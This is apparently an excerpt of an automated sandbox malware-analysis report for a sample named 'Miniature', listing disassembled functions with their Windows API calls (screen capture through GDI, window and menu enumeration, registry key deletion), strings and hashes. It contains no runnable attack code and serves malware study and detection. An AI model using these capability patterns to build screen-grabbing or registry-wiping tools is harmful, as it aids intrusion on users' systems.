                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: c04c267a39cbaf1e8fe806147523c71d5685b39b2952f361599e41cc45009ee7
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ae45e678cfc5886274ab29cd699eaf2c7218d422a8361cc6d0c00125b0f47bc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c04c267a39cbaf1e8fe806147523c71d5685b39b2952f361599e41cc45009ee7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81C18C34208201AFDB10DF54C4C9F6ABBE1BF85318F54859CF4668B6A2CB35ED86DB91
                                                                                                                                                                                                                                                                                            Function 00C92FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C93035
                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C93045
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00C93051
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00C9305E
                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C930CA
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C93109
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C9312D
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C93135
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00C9313E
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00C93145
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00C93150
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                            • Opcode ID: d3e8815093ef0f36f2411f2df5cd436fbc75f66b5b184e5371bc8c2bbff26e19
                                                                                                                                                                                                                                                                                            • Instruction ID: 974bab032cfe5560b237708f276231392bb9e663590f5e23d4d1eb7c73eebd02
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3e8815093ef0f36f2411f2df5cd436fbc75f66b5b184e5371bc8c2bbff26e19
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4961D3B5D00219EFCF14CFA4D888EAEBBB5FF48314F208529E556A7250D771AA41DF90
                                                                                                                                                                                                                                                                                            Function 00CAA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00CAA990
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00CAA9A7
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CAA9B3
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00CAA9C9
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00CAAC15
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CAAC33
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CAAC54
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00CAAC73
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00CAAC95
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 00CAACBB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 886f2a420031f4db16e4a4a215b91da2a67ec09bb0c0e0f7c353c6056ae220dd
                                                                                                                                                                                                                                                                                            • Instruction ID: 4134a01e9babcddce5fa0049c668ec84613594e913364ee17fa9e18bae7328e9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 886f2a420031f4db16e4a4a215b91da2a67ec09bb0c0e0f7c353c6056ae220dd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23B1BA7060021AEFDF14CF69C9C47AE3BF2BF45718F188069EC559B295D731AA80CB61
                                                                                                                                                                                                                                                                                            Function 00C752AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C752E6
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C75328
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C75339
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C75345
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7537A
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C753B2
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C753EB
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C75445
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C75477
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C754EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                            • Opcode ID: 21e2060b20b2f260a73bd320aea7ad17c461c4e069e5c4a42506ac11573c3dc3
                                                                                                                                                                                                                                                                                            • Instruction ID: 15a23124a5359f6e54ad098fe058456921c6b072aabcb80bdf303682f5818f43
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e2060b20b2f260a73bd320aea7ad17c461c4e069e5c4a42506ac11573c3dc3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB91F971104B06AFD708DF24C895BA9B7B9FF01304F008519FAAE830A1EBB1EE55CB91
                                                                                                                                                                                                                                                                                            Function 00CA976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA97B6
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00CA97C6
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00CA97D1
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00CA9879
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CA992B
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00CA9948
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00CA9958
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CA998A
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CA99CC
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA99FD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: e91486d5d9497919a12bda769d450dc889bbab7b13ab5b9f4fd77bd6984103e5
                                                                                                                                                                                                                                                                                            • Instruction ID: e1981461a1b576cbae405a5d5cf2425c63d51a0fef1136b803a647b12708b70c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e91486d5d9497919a12bda769d450dc889bbab7b13ab5b9f4fd77bd6984103e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9081B071504312AFD710CF25C886BAF7BE8FB8A318F10091DF99697291DB74DA05DBA2
                                                                                                                                                                                                                                                                                            Function 00C7C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00CE29C0,000000FF,00000000,00000030), ref: 00C7C973
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00CE29C0,00000004,00000000,00000030), ref: 00C7C9A8
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00C7C9BA
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C7CA00
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C7CA1D
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00C7CA49
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C7CA90
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7CAD6
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7CAEB
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7CB0C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 8840770f733ad4c8fba35297e1dae93f401fd877b45bbf3629d63ea382a7f566
                                                                                                                                                                                                                                                                                            • Instruction ID: e27ad66d7ac9c6d646d147b2f858479b580d45c2bce69b0f2b407e729be1f5c7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8840770f733ad4c8fba35297e1dae93f401fd877b45bbf3629d63ea382a7f566
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE6180B090024AAFDF11CF64D8C9BEE7BB9FB05358F048059F96AA3251D734AE11DB60
                                                                                                                                                                                                                                                                                            Function 00C7E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C7E4D4
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C7E4FA
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E504
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7E554
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C7E570
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                            • Opcode ID: eb1030a167e1a9b859c6b8591e009b969f7a431dab456e2af0252fabcb3efd85
                                                                                                                                                                                                                                                                                            • Instruction ID: b3dcc6a4a3335e4b7ce80d9bb02370c745fd4a8a4c4fafe80bbcf9fbc68f0001
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1030a167e1a9b859c6b8591e009b969f7a431dab456e2af0252fabcb3efd85
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 234133735102187AEB00AB649C47FFF776CEF56724F10406AF906E6192FB74AA01B2A5
                                                                                                                                                                                                                                                                                            Function 00C9D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9D6C4
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C9D6ED
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9D7A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C9D70A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C9D71D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9D72F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9D765
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9D788
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9D753
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: 79ed6d599bb95c6655f993e11131b7b0845df03c4b176e808028386329863ae6
                                                                                                                                                                                                                                                                                            • Instruction ID: fc73b5214fd1c2c63d84812eed85b02534ffc39016abb244e58dec21f3cf50fa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79ed6d599bb95c6655f993e11131b7b0845df03c4b176e808028386329863ae6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46315872A01129BBDB219BA1DC8CFEFBB7CEF46714F000165F917E3244DA349E459AA0
                                                                                                                                                                                                                                                                                            Function 00C7EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C7EFCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F215: timeGetTime.WINMM(?,?,00C7EFEB), ref: 00C2F219
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C7EFF8
                                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00C7F01C
                                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C7F03E
                                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 00C7F05D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C7F06B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C7F08A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00C7F095
                                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 00C7F0A1
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 00C7F0B2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                            • Opcode ID: a426835167259bc8184cee10e8014d4fecc358f58561bbe26cf8f950e5d780b9
                                                                                                                                                                                                                                                                                            • Instruction ID: 47c1a1358cec3a5abdc7e70cc99a1222634ac80344c36321670200248c7a6a98
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a426835167259bc8184cee10e8014d4fecc358f58561bbe26cf8f950e5d780b9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7217CB1500284BFEB116F70ACC9B2E7BADF74A749F008069F50B87672CB719D029A11
                                                                                                                                                                                                                                                                                            Function 00C7F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C7F374
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C7F38A
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7F39B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C7F3AD
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7F3BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
